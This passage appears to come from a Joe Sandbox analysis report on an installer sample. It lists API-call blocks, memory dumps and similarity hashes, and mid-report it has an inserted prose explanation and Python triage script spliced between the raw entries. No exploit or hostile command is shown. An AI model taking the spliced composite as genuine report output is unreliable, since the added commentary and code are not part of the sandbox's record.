                                            • Source File: 00000005.00000002.1842919653.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                             • Associated: 00000005.00000002.1842895422.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842950813.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.0000000000782000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.0000000000786000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.0000000000789000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.00000000007A9000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.00000000007AB000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.00000000007AE000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.00000000007C4000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.00000000007C6000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1843601762.00000000007C7000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: Text$ItemTimerWindowwsprintf
                                            • String ID: verifying installer: %d%%
                                            • API String ID: 1451636040-82062127
                                            • Opcode ID: e04d04eb7b63203ce5fd1c353c1d281d58231c4b0d3ff082bc1608e2171a15b6
                                            • Instruction ID: 448c993359d53400b231c8c55bc41b2c2aaf26e1e6946bd82a433317a94b79bc
                                            • Opcode Fuzzy Hash: e04d04eb7b63203ce5fd1c353c1d281d58231c4b0d3ff082bc1608e2171a15b6
                                            • Instruction Fuzzy Hash: 1101FF70640209BBEF209F60DE4AFAA3B79EB04349F008039FA16A51D1DBB999559F58
                                            APIs
                                              • Part of subcall function 7435121B: GlobalAlloc.KERNEL32(00000040,?,7435123B,?,743512DF,00000019,743511BE,-000000A0), ref: 74351225
                                            • GlobalFree.KERNEL32(?), ref: 743526A3
                                            • GlobalFree.KERNEL32(00000000), ref: 743526D8
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1895645572.0000000074351000.00000020.00000001.01000000.00000005.sdmp, Offset: 74350000, based on PE: true
                                             • Associated: 00000005.00000002.1895373883.0000000074350000.00000002.00000001.01000000.00000005.sdmp
                                             • Associated: 00000005.00000002.1896009053.0000000074354000.00000002.00000001.01000000.00000005.sdmp
                                             • Associated: 00000005.00000002.1896032502.0000000074356000.00000002.00000001.01000000.00000005.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_74350000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: Global$Free$Alloc
                                            • String ID:
                                            • API String ID: 1780285237-0
                                            • Opcode ID: c08e32d301f4b55be7d62d6b3b0b6bb15da9ced279a9c747340dca6d87fd0602
                                            • Instruction ID: 59e568133d0f4f1a2ad7d2a437064550dcf16bb3c4b29c37c3c0ccde118da829
                                            • Opcode Fuzzy Hash: c08e32d301f4b55be7d62d6b3b0b6bb15da9ced279a9c747340dca6d87fd0602
                                            • Instruction Fuzzy Hash: 92319932714501EBEB1A8F76C884E6AF7BEEB89310725452DF509C7224C770AA058FA1
                                            APIs
                                            • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 0040299B
                                            • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029B7
                                            • GlobalFree.KERNEL32(?), ref: 004029F0
                                            • GlobalFree.KERNEL32(00000000), ref: 00402A03
                                            • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,000000F0), ref: 00402A1B
                                            • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 00402A2F
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1842919653.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                             • Associated: 00000005.00000002.1842895422.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842950813.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.0000000000782000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.0000000000786000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.0000000000789000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.00000000007A9000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.00000000007AB000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.00000000007AE000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.00000000007C4000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.00000000007C6000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1843601762.00000000007C7000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: Global$AllocFree$CloseDeleteFileHandle
                                            • String ID:
                                            • API String ID: 2667972263-0
                                            • Opcode ID: d8979d593ffb7cda73e724eb2d1dda972fc418b833f0f64d77b01377f8a14e7c
                                            • Instruction ID: a183675b87451ddc5318bffc5c3e349b28a5858cebf66036b341c16136851789
                                            • Opcode Fuzzy Hash: d8979d593ffb7cda73e724eb2d1dda972fc418b833f0f64d77b01377f8a14e7c
                                            • Instruction Fuzzy Hash: B521AE71800124BBDF216FA5DE4999F7E79EF04364F10023AF560762E1CB784D419B98
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1895645572.0000000074351000.00000020.00000001.01000000.00000005.sdmp, Offset: 74350000, based on PE: true
                                             • Associated: 00000005.00000002.1895373883.0000000074350000.00000002.00000001.01000000.00000005.sdmp
                                             • Associated: 00000005.00000002.1896009053.0000000074354000.00000002.00000001.01000000.00000005.sdmp
                                             • Associated: 00000005.00000002.1896032502.0000000074356000.00000002.00000001.01000000.00000005.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_74350000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: FreeGlobal
                                            • String ID:
                                            • API String ID: 2979337801-0
                                            • Opcode ID: 43bbf2c51713dc408eab1921e3d0c195b983ec0e5cfd6a0f1d6af26bd5cde923
                                            • Instruction ID: df164e8f6d39b54117b9056e9870a119677e8df532d7c438bcf9031c19c14afd
                                            • Opcode Fuzzy Hash: 43bbf2c51713dc408eab1921e3d0c195b983ec0e5cfd6a0f1d6af26bd5cde923
                                            • Instruction Fuzzy Hash: 9E51B332E10555AADF039FB58580DAEFBBAEF84260B154359D40EE3138D6B0AF828791
                                            APIs
                                            • GlobalFree.KERNEL32(00000000), ref: 74352522
                                              • Part of subcall function 7435122C: lstrcpynW.KERNEL32(00000000,?,743512DF,00000019,743511BE,-000000A0), ref: 7435123C
                                            • GlobalAlloc.KERNEL32(00000040), ref: 743524A8
                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 743524C3
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1895645572.0000000074351000.00000020.00000001.01000000.00000005.sdmp, Offset: 74350000, based on PE: true
                                             • Associated: 00000005.00000002.1895373883.0000000074350000.00000002.00000001.01000000.00000005.sdmp
                                             • Associated: 00000005.00000002.1896009053.0000000074354000.00000002.00000001.01000000.00000005.sdmp
                                             • Associated: 00000005.00000002.1896032502.0000000074356000.00000002.00000001.01000000.00000005.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_74350000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
                                            • String ID:
                                            • API String ID: 4216380887-0
                                            • Opcode ID: a98ddd93a74443eebd9bbd302d85f90ab4b36b92bad0aa33d360c64aa5fddce2
                                            • Instruction ID: 4b125fa45d5881b1b29cca25d90dcd27b9c8c4d6351df1ecd840c1ab389a2b23
                                            • Opcode Fuzzy Hash: a98ddd93a74443eebd9bbd302d85f90ab4b36b92bad0aa33d360c64aa5fddce2
                                            • Instruction Fuzzy Hash: E241ABB1608605EFE7159F72D880E6AF7BCEB98310B24481DE44EC71A1DB30A6458FA1
                                            APIs
                                            • GetDlgItem.USER32(?,?), ref: 00401D9A
                                            • GetClientRect.USER32(?,?), ref: 00401DE5
                                            • LoadImageW.USER32(?,?,?,?,?,?), ref: 00401E15
                                            • SendMessageW.USER32(?,00000172,?,00000000), ref: 00401E29
                                            • DeleteObject.GDI32(00000000), ref: 00401E39
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1842919653.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                             • Associated: 00000005.00000002.1842895422.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842950813.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.0000000000782000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.0000000000786000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.0000000000789000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.00000000007A9000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.00000000007AB000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.00000000007AE000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.00000000007C4000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.00000000007C6000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1843601762.00000000007C7000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                            • String ID:
                                            • API String ID: 1849352358-0
                                            • Opcode ID: ba6a1121c828c2feaf6a58cab7d0464e4284a4e4311cb0c6e8eb76a326c22f0a
                                            • Instruction ID: b40b93da7826e3b7615b819c1b58470e7634271ab5df736de73e72df9abaa9c9
                                            • Opcode Fuzzy Hash: ba6a1121c828c2feaf6a58cab7d0464e4284a4e4311cb0c6e8eb76a326c22f0a
                                            • Instruction Fuzzy Hash: 1521F572904119AFCB05DFA4DE45AEEBBB5EB08304F14403AF945F62A0CB389D51DB99
                                            APIs
                                            • GetDC.USER32(?), ref: 00401E51
                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E6B
                                            • MulDiv.KERNEL32(00000000,00000000), ref: 00401E73
                                            • ReleaseDC.USER32(?,00000000), ref: 00401E84
                                            • CreateFontIndirectW.GDI32(0040CDC8), ref: 00401ED3
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1842919653.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                             • Associated: 00000005.00000002.1842895422.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842950813.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.0000000000782000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.0000000000786000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.0000000000789000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.00000000007A9000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.00000000007AB000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.00000000007AE000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.00000000007C4000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.00000000007C6000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1843601762.00000000007C7000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: CapsCreateDeviceFontIndirectRelease
                                            • String ID:
                                            • API String ID: 3808545654-0
                                            • Opcode ID: a771a12b6b1f9eb28fc4aa732c56658ca34c83768ad7333c3b90bf9ccbdf4b02
                                            • Instruction ID: e0f466a359637f901669b8d4edcb0a2768f8d1cf7dbd19b4a84ec7a1be175679
                                            • Opcode Fuzzy Hash: a771a12b6b1f9eb28fc4aa732c56658ca34c83768ad7333c3b90bf9ccbdf4b02
                                            • Instruction Fuzzy Hash: 3301D871950651EFEB006BB4AE89BDA3FB0AF15300F10493AF141B71E2C6B90404DB2D
                                            APIs
                                            • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CB3
                                            • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CCB
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1842919653.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                             • Associated: 00000005.00000002.1842895422.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842950813.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.0000000000782000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.0000000000786000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.0000000000789000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.00000000007A9000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.00000000007AB000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.00000000007AE000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.00000000007C4000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.00000000007C6000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1843601762.00000000007C7000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: MessageSend$Timeout
                                            • String ID: !
                                            • API String ID: 1777923405-2657877971
                                            • Opcode ID: 5263d4050aa59f0abe26d97075c7a8140079c933cf19c9a6478e3a25c126592f
                                            • Instruction ID: 189cbaabe8764c773f58747126bd63a1e8498669fac95269da527f62f649557f
                                            • Opcode Fuzzy Hash: 5263d4050aa59f0abe26d97075c7a8140079c933cf19c9a6478e3a25c126592f
                                            • Instruction Fuzzy Hash: EE21AD7195420AAEEF05AFB4DD4AAAE7BB0EF44304F10453EF601B61D1D7B84941CBA8
                                            APIs
                                            • lstrlenW.KERNEL32(007A1F48,007A1F48,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404C92
                                            • wsprintfW.USER32 ref: 00404C9B
                                            • SetDlgItemTextW.USER32(?,007A1F48), ref: 00404CAE
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1842919653.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                             • Associated: 00000005.00000002.1842895422.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842950813.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.0000000000782000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.0000000000786000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.0000000000789000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.00000000007A9000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.00000000007AB000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.00000000007AE000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.00000000007C4000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.00000000007C6000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1843601762.00000000007C7000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: ItemTextlstrlenwsprintf
                                            • String ID: %u.%u%s%s
                                            • API String ID: 3540041739-3551169577
                                            • Opcode ID: 37836083cc55521027f8373fcaefe3c58d3b132896e9bd9a1ff8b63297692a70
                                            • Instruction ID: 3d6b25ca05220dcf043cb3c1ab85a77e0c97cb6522f385c7b59333deb0f41e84
                                            • Opcode Fuzzy Hash: 37836083cc55521027f8373fcaefe3c58d3b132896e9bd9a1ff8b63297692a70
                                            • Instruction Fuzzy Hash: 4811EB736041283BEB00A5AD9D45EDE3688DBC5334F254637FA26F31D1E978C81182E8
                                            APIs
                                            • lstrlenW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\nszB5C8.tmp,00000023,?,00000000,00000002,00000011,00000002), ref: 004024CD
                                            • RegSetValueExW.ADVAPI32(?,?,?,?,C:\Users\user~1\AppData\Local\Temp\nszB5C8.tmp,00000000,?,00000000,00000002,00000011,00000002), ref: 0040250D
                                            • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user~1\AppData\Local\Temp\nszB5C8.tmp,00000000,?,00000000,00000002,00000011,00000002), ref: 004025F5
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1842919653.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                             • Associated: 00000005.00000002.1842895422.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842950813.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.0000000000782000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.0000000000786000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.0000000000789000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.00000000007A9000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.00000000007AB000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.00000000007AE000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.00000000007C4000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.00000000007C6000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1843601762.00000000007C7000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: CloseValuelstrlen
                                            • String ID: C:\Users\user~1\AppData\Local\Temp\nszB5C8.tmp
                                            • API String ID: 2655323295-3523672939
                                            • Opcode ID: 963143206141bdcaaccd5c48088be57f5098dce3fb9d3c4ae02d7804e6155511
                                            • Instruction ID: b5ab21fa5db9dca98c90a3684f9c4c1c94415ceb852b3cd4d8f68548cc0c41e7
                                            • Opcode Fuzzy Hash: 963143206141bdcaaccd5c48088be57f5098dce3fb9d3c4ae02d7804e6155511
                                            • Instruction Fuzzy Hash: D311AF71E00108BEEB00AFA5CE49AAE7BB9EF44314F20443AF514B71D1D6B88D409668
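The function blocks listed above are the unit an analyst works from when reading a Joe Sandbox report: each carries the Win32 calls (with the `ref:` return address), the constant string the block uses, and the `API String ID` / fuzzy-hash identifiers that the report's Similarity section keys on. The block directly above is a typical example, a `RegSetValueExW` whose value argument is the installer's own temporary file under `%TEMP%` (`nszB5C8.tmp`). The following Python is an added example, not code from Joe Sandbox or from the sample: it parses records in this shape from the report text, pulls out the call names, arguments, return addresses and metadata, and flags blocks that write the registry, delete files or reference a path under `AppData\Local\Temp`. The input is a constructed excerpt in the report's layout. The triage sets (`REG_WRITE`, `FILE_DELETE`), the temp-path regex and the `api_jaccard` helper are my own heuristics and have nothing to do with how Joe Sandbox computes its Similarity scores or fuzzy hashes.

```python
import re
from collections import namedtuple
from dataclasses import dataclass, field

# Constructed sample in the shape of the report's function blocks above.
SAMPLE = r"""
APIs
• lstrlenW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\nszB5C8.tmp,00000023,?), ref: 004024CD
• wsprintfW.USER32 ref: 00404C9B
• RegSetValueExW.ADVAPI32(?,?,?,?,C:\Users\user~1\AppData\Local\Temp\nszB5C8.tmp,00000000), ref: 0040250D
• RegCloseKey.ADVAPI32(?), ref: 004025F5
Memory Dump Source
• Source File: 00000005.00000002.1842919653.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• String ID: C:\Users\user~1\AppData\Local\Temp\nszB5C8.tmp
• API String ID: 2655323295-3523672939
APIs
  • Part of subcall function 004063EE: lstrcpynW.KERNEL32(?,?,00000400,NSIS Error), ref: 004063FB
• GlobalAlloc.KERNEL32(00000040,?,00000000,40000000), ref: 0040299B
• DeleteFileW.KERNEL32(?,00000000,40000000,00000002), ref: 00402A2F
Similarity
• String ID:
• API String ID: 2667972263-0
"""

LABELS = {"Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}
API_RE = re.compile(r"^(?:Part of subcall function (?P<caller>[0-9A-Fa-f]+): )?"
                    r"(?P<api>\w+)\.(?P<module>\w+)(?:\((?P<args>.*)\))?"
                    r"(?:,? ref: (?P<ref>[0-9A-Fa-f]+))?$")  # wsprintfW.USER32 has no arg list
TEMP_RE = re.compile(r"[A-Za-z]:\\Users\\[^\\,]+\\AppData\\Local\\Temp\\[^,)]+")
# Assumed triage sets (my choice of interesting Win32 calls, not a Joe Sandbox list).
REG_WRITE = {"RegSetValueExW", "RegSetValueExA", "RegCreateKeyExW", "RegCreateKeyExA"}
FILE_DELETE = {"DeleteFileW", "DeleteFileA"}
ApiCall = namedtuple("ApiCall", "api module args ref from_subcall")

@dataclass
class Block:
    calls: list = field(default_factory=list)
    meta: dict = field(default_factory=dict)  # "String ID", "API String ID", ...
    source: str = ""

    def api_names(self):
        return {c.api for c in self.calls}

    def temp_paths(self):
        """%TEMP% paths seen as call arguments or as the block's String ID."""
        found = set(TEMP_RE.findall(self.meta.get("String ID", "")))
        for c in self.calls:
            for a in c.args:
                found.update(TEMP_RE.findall(a))
        return found

def parse_blocks(text):
    """One Block per 'APIs' header; bullet lines are routed by the label last seen."""
    blocks, cur, section = [], None, None
    for line in (ln.strip() for ln in text.splitlines()):
        if line == "APIs":
            cur, section = Block(), "apis"
            blocks.append(cur)
        elif line in LABELS:
            section = line
        elif cur is None or not line.startswith("• "):
            continue
        elif section == "apis":
            m = API_RE.match(line[2:])
            if m:
                args = m["args"] or ""
                cur.calls.append(ApiCall(m["api"], m["module"],
                                         [a.strip() for a in args.split(",")] if args else [],
                                         m["ref"] or "", m["caller"] is not None))
        elif section == "Memory Dump Source" and line.startswith("• Source File:"):
            cur.source = line[len("• Source File:"):].strip()
        elif ":" in line:
            key, _, value = line[2:].partition(":")
            cur.meta[key.strip()] = value.strip()
    return blocks

def api_jaccard(a, b):
    """Crude similarity: Jaccard over API names (not the report's fuzzy hash)."""
    union = a.api_names() | b.api_names()
    return len(a.api_names() & b.api_names()) / len(union) if union else 0.0

def triage(blocks):
    """Flag blocks that write the registry, delete files or reference %TEMP%."""
    findings = []
    for i, b in enumerate(blocks):
        names, hits = b.api_names(), []
        if names & REG_WRITE:
            hits.append("registry write")
        if names & FILE_DELETE:
            hits.append("file delete")
        for p in sorted(b.temp_paths()):
            hits.append("temp path: " + p)
        if hits:
            findings.append({"block": i, "api_string_id": b.meta.get("API String ID", ""),
                             "refs": [c.ref for c in b.calls], "hits": hits})
    return findings
```

Run `triage(parse_blocks(text))` over a saved copy of the report's function-block section to get one finding per block that touches the registry, deletes a file or names a temp path, keyed by the block's `API String ID` so it can be matched back to the report. The `ref:` addresses are kept so a finding can be followed into the memory dump listed as the block's source file; `from_subcall` distinguishes calls the report attributes to a callee (the indented "Part of subcall function" lines) from calls made in the block itself.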
                                            APIs
                                              • Part of subcall function 004063EE: lstrcpynW.KERNEL32(?,?,00000400,00403573,007A7A60,NSIS Error,?,00000007,00000009,0000000B), ref: 004063FB
                                              • Part of subcall function 00405D6E: CharNextW.USER32(?,?,C:\Users\user~1\AppData\Local\Temp\nszB5C8.tmp,?,00405DE2,C:\Users\user~1\AppData\Local\Temp\nszB5C8.tmp,C:\Users\user~1\AppData\Local\Temp\nszB5C8.tmp,771B3420,?,C:\Users\user~1\AppData\Local\Temp\,00405B20,?,771B3420,C:\Users\user~1\AppData\Local\Temp\,00000000), ref: 00405D7C
                                              • Part of subcall function 00405D6E: CharNextW.USER32(00000000), ref: 00405D81
                                              • Part of subcall function 00405D6E: CharNextW.USER32(00000000), ref: 00405D99
                                            • lstrlenW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\nszB5C8.tmp,00000000,C:\Users\user~1\AppData\Local\Temp\nszB5C8.tmp,C:\Users\user~1\AppData\Local\Temp\nszB5C8.tmp,771B3420,?,C:\Users\user~1\AppData\Local\Temp\,00405B20,?,771B3420,C:\Users\user~1\AppData\Local\Temp\,00000000), ref: 00405E24
